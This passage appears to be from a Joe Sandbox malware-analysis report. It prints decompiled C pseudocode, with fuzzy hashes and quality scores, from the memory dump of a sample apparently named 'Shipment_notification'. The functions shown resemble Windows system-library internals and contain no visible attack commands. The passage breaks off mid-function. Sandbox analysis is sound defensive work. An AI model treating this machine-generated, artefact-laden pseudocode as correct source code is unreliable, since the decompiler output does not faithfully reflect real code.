                                                                                				signed int _v528;
                                                                                				void* _v532;
                                                                                				char _v536;
                                                                                				char _v540;
                                                                                				char _v544;
                                                                                				intOrPtr* _v548;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                				void* _t48;
                                                                                				signed int _t53;
                                                                                				signed int _t55;
                                                                                				intOrPtr* _t62;
                                                                                				void* _t63;
                                                                                				unsigned int _t75;
                                                                                				signed int _t79;
                                                                                				unsigned int _t81;
                                                                                				unsigned int _t83;
                                                                                				signed int _t84;
                                                                                				void* _t87;
                                                                                
                                                                                				_t76 = __edx;
                                                                                				_v8 =  *0x1bdd360 ^ _t84;
                                                                                				_v536 = 0x200;
                                                                                				_t79 = 0;
                                                                                				_v548 = __edx;
                                                                                				_v544 = 0;
                                                                                				_t62 = __ecx;
                                                                                				_v540 = 0;
                                                                                				_v532 =  &_v524;
                                                                                				if(__edx == 0 || __ecx == 0) {
                                                                                					L6:
                                                                                					return L01B2B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                				} else {
                                                                                					_v528 = 0;
                                                                                					E01AFE9C0(1, __ecx, 0, 0,  &_v528);
                                                                                					_t44 = _v528;
                                                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                					_t46 = 0xa;
                                                                                					_t87 = _t81 - _t46;
                                                                                					if(_t87 > 0 || _t87 == 0) {
                                                                                						 *_v548 = 0x1ac1180;
                                                                                						L5:
                                                                                						_t79 = 1;
                                                                                						goto L6;
                                                                                					} else {
                                                                                						_t48 = E01B11DB5(_t62,  &_v532,  &_v536);
                                                                                						_t76 = _v528;
                                                                                						if(_t48 == 0) {
                                                                                							L9:
                                                                                							E01B23C2A(_t81, _t76,  &_v544);
                                                                                							 *_v548 = _v544;
                                                                                							goto L5;
                                                                                						}
                                                                                						_t62 = _v532;
                                                                                						if(_t62 != 0) {
                                                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                							_t53 =  *_t62;
                                                                                							_v528 = _t53;
                                                                                							if(_t53 != 0) {
                                                                                								_t63 = _t62 + 4;
                                                                                								_t55 = _v528;
                                                                                								do {
                                                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                										if(E01AF8999(_t63,  &_v540) == 0) {
                                                                                											_t55 = _v528;
                                                                                										} else {
                                                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                											_t55 = _v528;
                                                                                											if(_t75 >= _t83) {
                                                                                												_t83 = _t75;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									_t63 = _t63 + 0x14;
                                                                                									_t55 = _t55 - 1;
                                                                                									_v528 = _t55;
                                                                                								} while (_t55 != 0);
                                                                                								_t62 = _v532;
                                                                                							}
                                                                                							if(_t62 !=  &_v524) {
                                                                                								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                							}
                                                                                							_t76 = _t83 & 0x0000ffff;
                                                                                							_t81 = _t83 >> 0x10;
                                                                                						}
                                                                                						goto L9;
                                                                                					}
                                                                                				}
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd

                                                                                C-Code - Quality: 69%
                                                                                			E01B669A6(signed short* __ecx, void* __eflags) {
                                                                                				signed int _v8;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				signed short _v28;
                                                                                				signed int _v32;
                                                                                				intOrPtr _v36;
                                                                                				signed int _v40;
                                                                                				char* _v44;
                                                                                				signed int _v48;
                                                                                				intOrPtr _v52;
                                                                                				signed int _v56;
                                                                                				char _v60;
                                                                                				signed int _v64;
                                                                                				char _v68;
                                                                                				char _v72;
                                                                                				signed short* _v76;
                                                                                				signed int _v80;
                                                                                				char _v84;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t68;
                                                                                				intOrPtr _t73;
                                                                                				signed short* _t74;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				signed int _t79;
                                                                                				signed int _t80;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t80;
                                                                                				_t75 = 0x100;
                                                                                				_v64 = _v64 & 0x00000000;
                                                                                				_v76 = __ecx;
                                                                                				_t79 = 0;
                                                                                				_t68 = 0;
                                                                                				_v72 = 1;
                                                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                				_t77 = 0;
                                                                                				if(L01AF6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                					if(_t79 != 0 && E01B66BA3() != 0) {
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0x1f0003);
                                                                                						_push( &_v64);
                                                                                						if(E01B29980() >= 0) {
                                                                                							E01B02280(_t56, 0x1bd8778);
                                                                                							_t77 = 1;
                                                                                							_t68 = 1;
                                                                                							if( *0x1bd8774 == 0) {
                                                                                								asm("cdq");
                                                                                								 *(_t79 + 0xf70) = _v64;
                                                                                								 *(_t79 + 0xf74) = 0x100;
                                                                                								_t75 = 0;
                                                                                								_t73 = 4;
                                                                                								_v60 =  &_v68;
                                                                                								_v52 = _t73;
                                                                                								_v36 = _t73;
                                                                                								_t74 = _v76;
                                                                                								_v44 =  &_v72;
                                                                                								 *0x1bd8774 = 1;
                                                                                								_v56 = 0;
                                                                                								_v28 = _t74[2];
                                                                                								_v48 = 0;
                                                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                								_v40 = 0;
                                                                                								_v32 = 0;
                                                                                								_v24 = 0;
                                                                                								_v16 = 0;
                                                                                								if(E01AEB6F0(0x1acc338, 0x1acc288, 3,  &_v60) == 0) {
                                                                                									_v80 = _v80 | 0xffffffff;
                                                                                									_push( &_v84);
                                                                                									_push(0);
                                                                                									_push(_v64);
                                                                                									_v84 = 0xfa0a1f00;
                                                                                									E01B29520();
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				if(_v64 != 0) {
                                                                                					_push(_v64);
                                                                                					E01B295D0();
                                                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                				}
                                                                                				if(_t77 != 0) {
                                                                                					E01AFFFB0(_t68, _t77, 0x1bd8778);
                                                                                				}
                                                                                				_pop(_t78);
                                                                                				return L01B2B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd

                                                                                C-Code - Quality: 85%
                                                                                			E01AE5210(intOrPtr _a4, void* _a8) {
                                                                                				void* __ecx;
                                                                                				intOrPtr _t31;
                                                                                				signed int _t32;
                                                                                				signed int _t33;
                                                                                				intOrPtr _t35;
                                                                                				signed int _t52;
                                                                                				void* _t54;
                                                                                				void* _t56;
                                                                                				unsigned int _t59;
                                                                                				signed int _t60;
                                                                                				void* _t61;
                                                                                
                                                                                				_t61 = E01AE52A5(1);
                                                                                				if(_t61 == 0) {
                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                                				} else {
                                                                                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                                				}
                                                                                				_t60 = _t59 >> 1;
                                                                                				_t32 = 0x3a;
                                                                                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                                					_t52 = _t60 + _t60;
                                                                                					if(_a4 > _t52) {
                                                                                						goto L5;
                                                                                					}
                                                                                					if(_t61 != 0) {
                                                                                						asm("lock xadd [esi], eax");
                                                                                						if((_t32 | 0xffffffff) == 0) {
                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                							E01B295D0();
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                						}
                                                                                					} else {
                                                                                						E01AFEB70(_t54, 0x1bd79a0);
                                                                                					}
                                                                                					_t26 = _t52 + 2; // 0xddeeddf0
                                                                                					return _t26;
                                                                                				} else {
                                                                                					_t52 = _t60 + _t60;
                                                                                					if(_a4 < _t52) {
                                                                                						if(_t61 != 0) {
                                                                                							asm("lock xadd [esi], eax");
                                                                                							if((_t32 | 0xffffffff) == 0) {
                                                                                								_push( *((intOrPtr*)(_t61 + 4)));
                                                                                								E01B295D0();
                                                                                								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                							}
                                                                                						} else {
                                                                                							E01AFEB70(_t54, 0x1bd79a0);
                                                                                						}
                                                                                						return _t52;
                                                                                					}
                                                                                					L5:
                                                                                					_t33 = E01B2F3E0(_a8, _t54, _t52);
                                                                                					if(_t61 == 0) {
                                                                                						E01AFEB70(_t54, 0x1bd79a0);
                                                                                					} else {
                                                                                						asm("lock xadd [esi], eax");
                                                                                						if((_t33 | 0xffffffff) == 0) {
                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                							E01B295D0();
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                						}
                                                                                					}
                                                                                					_t35 = _a8;
                                                                                					if(_t60 <= 1) {
                                                                                						L9:
                                                                                						_t60 = _t60 - 1;
                                                                                						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_t56 = 0x3a;
                                                                                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                                							 *((short*)(_t52 + _t35)) = 0;
                                                                                							L10:
                                                                                							return _t60 + _t60;
                                                                                						}
                                                                                						goto L9;
                                                                                					}
                                                                                				}
                                                                                			}















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0168095d79d83fe27279115592ce0facdc8e70cb29d74d237e849b7c4a30ef61
                                                                                • Instruction ID: 880b7a6233fc1b738657d8eff301bf43eb81ce3dfb76ea387e58cf3a9acaed2b
                                                                                • Opcode Fuzzy Hash: 0168095d79d83fe27279115592ce0facdc8e70cb29d74d237e849b7c4a30ef61
                                                                                • Instruction Fuzzy Hash: EB315B31641611EBC72EAF28C840FAA77B5FF10764F118659FA994B1A1DB30F804D6D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B23D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				signed short** _t33;
                                                                                				short* _t38;
                                                                                				intOrPtr* _t39;
                                                                                				intOrPtr* _t41;
                                                                                				signed short _t43;
                                                                                				intOrPtr* _t47;
                                                                                				intOrPtr* _t53;
                                                                                				signed short _t57;
                                                                                				intOrPtr _t58;
                                                                                				signed short _t60;
                                                                                				signed short* _t61;
                                                                                
                                                                                				_t47 = __ecx;
                                                                                				_t61 = __edx;
                                                                                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                				if(_t60 > 0xfffe) {
                                                                                					L22:
                                                                                					return 0xc0000106;
                                                                                				}
                                                                                				if(__edx != 0) {
                                                                                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                						L5:
                                                                                						E01AF7B60(0, _t61, 0x1ac11c4);
                                                                                						_v12 =  *_t47;
                                                                                						_v12 = _v12 + 0xfff8;
                                                                                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                						E01AF7B60(0xfff8, _t61,  &_v12);
                                                                                						_t33 = _a8;
                                                                                						if(_t33 != 0) {
                                                                                							 *_t33 = _t61;
                                                                                						}
                                                                                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                						_t53 = _a12;
                                                                                						if(_t53 != 0) {
                                                                                							_t57 = _t61[2];
                                                                                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                							while(_t38 >= _t57) {
                                                                                								if( *_t38 == 0x5c) {
                                                                                									_t41 = _t38 + 2;
                                                                                									if(_t41 == 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t58 = 0;
                                                                                									if( *_t41 == 0) {
                                                                                										L19:
                                                                                										 *_t53 = _t58;
                                                                                										goto L7;
                                                                                									}
                                                                                									 *_t53 = _t41;
                                                                                									goto L7;
                                                                                								}
                                                                                								_t38 = _t38 - 2;
                                                                                							}
                                                                                							_t58 = 0;
                                                                                							goto L19;
                                                                                						} else {
                                                                                							L7:
                                                                                							_t39 = _a16;
                                                                                							if(_t39 != 0) {
                                                                                								 *_t39 = 0;
                                                                                								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                							}
                                                                                							return 0;
                                                                                						}
                                                                                					}
                                                                                					_t61 = _a4;
                                                                                					if(_t61 != 0) {
                                                                                						L3:
                                                                                						_t43 = L01B04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                						_t61[2] = _t43;
                                                                                						if(_t43 == 0) {
                                                                                							return 0xc0000017;
                                                                                						}
                                                                                						_t61[1] = _t60;
                                                                                						 *_t61 = 0;
                                                                                						goto L5;
                                                                                					}
                                                                                					goto L22;
                                                                                				}
                                                                                				_t61 = _a4;
                                                                                				if(_t61 == 0) {
                                                                                					return 0xc000000d;
                                                                                				}
                                                                                				goto L3;
                                                                                			}

















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e6ee900793069b4fca48a8d6f876a1669f481930a8b4bd745a9adaced7642687
                                                                                • Instruction ID: a0fb2ca745d3f2097f923b4268bc6d4ccdfd802b867bd2d87d29d949d6c813b3
                                                                                • Opcode Fuzzy Hash: e6ee900793069b4fca48a8d6f876a1669f481930a8b4bd745a9adaced7642687
                                                                                • Instruction Fuzzy Hash: 7631BE31A04625DBD72D9F2DC841A7ABBF5FF49740B0581AEE949CB360E738D844C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E01B0C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                				signed int* _v8;
                                                                                				char _v16;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed char _t33;
                                                                                				signed char _t43;
                                                                                				signed char _t48;
                                                                                				signed char _t62;
                                                                                				void* _t63;
                                                                                				intOrPtr _t69;
                                                                                				intOrPtr _t71;
                                                                                				unsigned int* _t82;
                                                                                				void* _t83;
                                                                                
                                                                                				_t80 = __ecx;
                                                                                				_t82 = __edx;
                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                				if((_t33 & 0x00000001) != 0) {
                                                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                					if(E01B07D50() != 0) {
                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                					} else {
                                                                                						_t43 = 0x7ffe0386;
                                                                                					}
                                                                                					if( *_t43 != 0) {
                                                                                						_t43 = E01BB8D34(_v8, _t80);
                                                                                					}
                                                                                					E01B02280(_t43, _t82);
                                                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                						E01AFFFB0(_t62, _t80, _t82);
                                                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                                                						_t83 = _t30;
                                                                                						E01BB8833(_t83,  &_v16);
                                                                                						_t81 = _t80 + 0x90;
                                                                                						E01AFFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                						_t63 = 0;
                                                                                						_push(0);
                                                                                						_push(_t83);
                                                                                						_t48 = E01B2B180();
                                                                                						if(_a4 != 0) {
                                                                                							E01B02280(_t48, _t81);
                                                                                						}
                                                                                					} else {
                                                                                						_t69 = _v8;
                                                                                						_t12 = _t80 + 0x98; // 0x98
                                                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                						E01B0BB2D(_t13, _t12);
                                                                                						_t71 = _v8;
                                                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                						E01B0BB2D(_t16, _t15);
                                                                                						E01B0B944(_v8, _t62);
                                                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                						E01AFFFB0(0, _t80, _t82);
                                                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                						 *(_t80 + 0xde) = 0;
                                                                                						if(_a4 == 0) {
                                                                                							_t25 = _t80 + 0x90; // 0x90
                                                                                							E01AFFFB0(0, _t80, _t25);
                                                                                						}
                                                                                						_t63 = 1;
                                                                                					}
                                                                                					return _t63;
                                                                                				}
                                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                				if(_a4 == 0) {
                                                                                					_t24 = _t80 + 0x90; // 0x90
                                                                                					E01AFFFB0(0, __ecx, _t24);
                                                                                				}
                                                                                				return 0;
                                                                                			}

















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                • Instruction ID: 199db5749294ee3405c450f101cc9dd10227a2f8413d7ceb99c57340cde5b881
                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                • Instruction Fuzzy Hash: 0831F272A01547AEDB0EEBB5C980BE9FF54FF52204F1442DAD51C97381DB346A4ACBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E01B67016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                				signed int _v8;
                                                                                				char _v588;
                                                                                				intOrPtr _v592;
                                                                                				intOrPtr _v596;
                                                                                				signed short* _v600;
                                                                                				char _v604;
                                                                                				short _v606;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed short* _t55;
                                                                                				void* _t56;
                                                                                				signed short* _t58;
                                                                                				signed char* _t61;
                                                                                				char* _t68;
                                                                                				void* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				signed int _t75;
                                                                                
                                                                                				_t64 = __edx;
                                                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                				_v8 =  *0x1bdd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                				_t55 = _a16;
                                                                                				_v606 = __ecx;
                                                                                				_t71 = 0;
                                                                                				_t58 = _a12;
                                                                                				_v596 = __edx;
                                                                                				_v600 = _t58;
                                                                                				_t68 =  &_v588;
                                                                                				if(_t58 != 0) {
                                                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                					if(_t55 != 0) {
                                                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                					}
                                                                                				}
                                                                                				_t8 = _t71 + 0x2a; // 0x28
                                                                                				_t33 = _t8;
                                                                                				_v592 = _t8;
                                                                                				if(_t71 <= 0x214) {
                                                                                					L6:
                                                                                					 *((short*)(_t68 + 6)) = _v606;
                                                                                					if(_t64 != 0xffffffff) {
                                                                                						asm("cdq");
                                                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                						if(_t71 != 0) {
                                                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                                                							_t64 = _t22;
                                                                                							E01B66B4C(_t58, _t22, _t71,  &_v604);
                                                                                							if(_t55 != 0) {
                                                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                                                								_t64 = _t25 + _t68;
                                                                                								E01B66B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                							}
                                                                                							if(E01B07D50() == 0) {
                                                                                								_t61 = 0x7ffe0384;
                                                                                							} else {
                                                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                							}
                                                                                							_push(_t68);
                                                                                							_push(_v592 + 0xffffffe0);
                                                                                							_push(0x402);
                                                                                							_push( *_t61 & 0x000000ff);
                                                                                							E01B29AE0();
                                                                                						}
                                                                                					}
                                                                                					_t35 =  &_v588;
                                                                                					if( &_v588 != _t68) {
                                                                                						_t35 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                					}
                                                                                					L16:
                                                                                					_pop(_t69);
                                                                                					_pop(_t72);
                                                                                					_pop(_t56);
                                                                                					return L01B2B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                				}
                                                                                				_t68 = L01B04620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                				if(_t68 == 0) {
                                                                                					goto L16;
                                                                                				} else {
                                                                                					_t58 = _v600;
                                                                                					_t64 = _v596;
                                                                                					goto L6;
                                                                                				}
                                                                                			}























                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0635a963c5dc146da6fe415228f0249892e241ae7042660bc6759badbb9d99f4
                                                                                • Instruction ID: b1ef9384b804d6b83b2d201a30e6278fb29ea06da81820ad794947b4c4295e1c
                                                                                • Opcode Fuzzy Hash: 0635a963c5dc146da6fe415228f0249892e241ae7042660bc6759badbb9d99f4
                                                                                • Instruction Fuzzy Hash: 6C310272604751DBC329DF28C841A6AB7E9FF98700F044A69F99887680EB34E904C7A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E01B1A70E(intOrPtr* __ecx, char* __edx) {
                                                                                				unsigned int _v8;
                                                                                				intOrPtr* _v12;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t16;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t28;
                                                                                				char* _t33;
                                                                                				intOrPtr _t37;
                                                                                				intOrPtr _t38;
                                                                                				void* _t50;
                                                                                				intOrPtr _t52;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t52 =  *0x1bd7b10; // 0x0
                                                                                				_t33 = __edx;
                                                                                				_t48 = __ecx;
                                                                                				_v12 = __ecx;
                                                                                				if(_t52 == 0) {
                                                                                					 *0x1bd7b10 = 8;
                                                                                					 *0x1bd7b14 = 0x1bd7b0c;
                                                                                					 *0x1bd7b18 = 1;
                                                                                					L6:
                                                                                					_t2 = _t52 + 1; // 0x1
                                                                                					E01B1A990(0x1bd7b10, _t2, 7);
                                                                                					asm("bts ecx, eax");
                                                                                					 *_t48 = _t52;
                                                                                					 *_t33 = 1;
                                                                                					L3:
                                                                                					_t16 = 0;
                                                                                					L4:
                                                                                					return _t16;
                                                                                				}
                                                                                				_t17 = L01B1A840(__edx, __ecx, __ecx, _t52, 0x1bd7b10, 1, 0);
                                                                                				if(_t17 == 0xffffffff) {
                                                                                					_t37 =  *0x1bd7b10; // 0x0
                                                                                					_t3 = _t37 + 0x27; // 0x27
                                                                                					__eflags = _t3 >> 5 -  *0x1bd7b18; // 0x0
                                                                                					if(__eflags > 0) {
                                                                                						_t38 =  *0x1bd7b9c; // 0x0
                                                                                						_t4 = _t52 + 0x27; // 0x27
                                                                                						_v8 = _t4 >> 5;
                                                                                						_t50 = L01B04620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                                						__eflags = _t50;
                                                                                						if(_t50 == 0) {
                                                                                							_t16 = 0xc0000017;
                                                                                							goto L4;
                                                                                						}
                                                                                						 *0x1bd7b18 = _v8;
                                                                                						_t8 = _t52 + 7; // 0x7
                                                                                						E01B2F3E0(_t50,  *0x1bd7b14, _t8 >> 3);
                                                                                						_t28 =  *0x1bd7b14; // 0x0
                                                                                						__eflags = _t28 - 0x1bd7b0c;
                                                                                						if(_t28 != 0x1bd7b0c) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                						}
                                                                                						_t9 = _t52 + 8; // 0x8
                                                                                						 *0x1bd7b14 = _t50;
                                                                                						_t48 = _v12;
                                                                                						 *0x1bd7b10 = _t9;
                                                                                						goto L6;
                                                                                					}
                                                                                					 *0x1bd7b10 = _t37 + 8;
                                                                                					goto L6;
                                                                                				}
                                                                                				 *__ecx = _t17;
                                                                                				 *_t33 = 0;
                                                                                				goto L3;
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • Opcode ID: 8eca434754b1d1ea2f3f732ae9517012ae2b5969e171a40d7eed2be405ff9db3
                                                                                • Instruction ID: 2bdb9b869bba3ea828eec0d1bf0a5fb7551b9131056eefe2568f33fef53e3532
                                                                                • Opcode Fuzzy Hash: 8eca434754b1d1ea2f3f732ae9517012ae2b5969e171a40d7eed2be405ff9db3
                                                                                • Instruction Fuzzy Hash: 9B3106B1222241DFD72DCF18D8B0FA57BF9FB84714F41099AEA45C7248EB70AA01C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E01B161A0(signed int* __ecx) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				intOrPtr* _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t31;
                                                                                				void* _t32;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t37;
                                                                                				intOrPtr _t49;
                                                                                				signed int _t51;
                                                                                				intOrPtr _t52;
                                                                                				signed int _t54;
                                                                                				void* _t59;
                                                                                				signed int* _t61;
                                                                                				intOrPtr* _t64;
                                                                                
                                                                                				_t61 = __ecx;
                                                                                				_v12 = 0;
                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                				_v16 = __ecx;
                                                                                				_v8 = 0;
                                                                                				if(_t30 == 0) {
                                                                                					L6:
                                                                                					_t31 = 0;
                                                                                					L7:
                                                                                					return _t31;
                                                                                				}
                                                                                				_t32 = _t30 + 0x5d8;
                                                                                				if(_t32 == 0) {
                                                                                					goto L6;
                                                                                				}
                                                                                				_t59 = _t32 + 0x30;
                                                                                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                                					goto L6;
                                                                                				}
                                                                                				if(__ecx != 0) {
                                                                                					 *((intOrPtr*)(__ecx)) = 0;
                                                                                					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                                					_t51 =  *(_t32 + 0x10);
                                                                                					_t33 = _t32 + 0x10;
